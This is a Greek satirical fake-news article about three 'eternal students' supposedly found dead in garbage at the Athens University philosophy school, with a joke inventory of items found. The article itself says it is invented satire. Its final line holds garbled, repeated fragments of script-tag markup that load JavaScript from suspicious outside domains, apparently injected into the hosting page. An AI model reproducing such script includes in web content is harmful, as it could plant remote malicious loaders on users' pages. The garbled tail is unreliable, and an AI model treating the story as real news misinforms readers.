ΣΟΚ! 3 νεκροί ανάμεσα στα σκουπίδια της Φιλοσοφικής

Όπως όλοι γνωρίζουμε, πριν από λίγες ημέρες, έγινε συλλογή απορριμάτων από τον χώρο της Φιλοσοφικής σχολής του ΕΚΠΑ στου Ζωγράφου. Ο χώρος της σχολής παρέμενε γεμάτος σκουπίδια για τους τελευταίους 6 μήνες, αφού είχαν τεθεί σε διαθεσιμότητα οι υπάλληλοι καθαριότητας του πανεπιστημίου.

Γράφει η Βίκυ Κουλούρη

Σύμφωνα με τις πρώτες πληροφορίες, περισυνελέγησαν 5.5 τόνοι σκουπιδιών.

Ύστερα από επίσημη καταγγελία στο 4news.gr από περαστικό, ανάμεσα στους τόνους σκουπιδιών, οι αρχές εντόπισαν σήμερα (με τη βοήθεια του μάρτυρα που επιθυμεί να παραμείνει ανώνυμος) τις σωρούς 3 ανθρώπων. Ανεπιβεβαίωτες πληροφορίες κάνουν λόγο για δύο άντρες (ηλικίας 39 και 44) και μια γυναίκα (ηλικίας 41 χρόνων). Η αστυνομία κάνει λόγο για αιώνιους φοιτητές. Πρόκειται για φοιτητές που είχαν εισαχθεί στην Φιλοσοφική την προηγούμενη δεκαετία και είχαν εξαφανιστεί χωρίς να έχουν βρεθεί ποτέ τα ίχνη τους.

Έπειτα από την ταυτοποίηση των στοιχείων των θανόντων προέκυψε ότι ο χαμός τους δεν είναι προϊόν εγκληματικής ενέργειας, αλλά αιτιών που σχετίζονται με παρατεταμένη αδράνεια και οκνηρία.

Σύμφωνα με την επίσημη αναφορά των συνεργείων, στα απορρίματα βρέθηκαν τα εξής αντικείμενα:

3 σοροί «αιώνιων» φοιτητών, συνολικού βάρους 2.000 κιλών
1.700 κιλά σημειώσεις από πολιτικές παρατάξεις (ΚΝΕ, ΔΑΠ, ΣΥΡΙΖΑ, ΠΑΣΠ)
200 κιλά πούλια και ζάρια ταβλιού
16 κιλά γαρύφαλλα σε κατάσταση αποσύνθεσης
5 κιθάρες, 3 τουμπερλέκια, ένα τρίχορδο μπουζούκι και 1 ντέφι
3 αντιασφυξιογόνες μάσκες και 3 ασπίδες των ΜΑΤ

(Σημείωση: Το κείμενο αυτό και η φωτογραφία που το συνοδεύει, αποτελούν προϊόν επινόησης με στόχο τη σάτιρα και σε καμία περίπτωση δεν ανταποκρίνονται στην πραγματικότητα. Καταναλώστε τα υπεύθυνα)___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >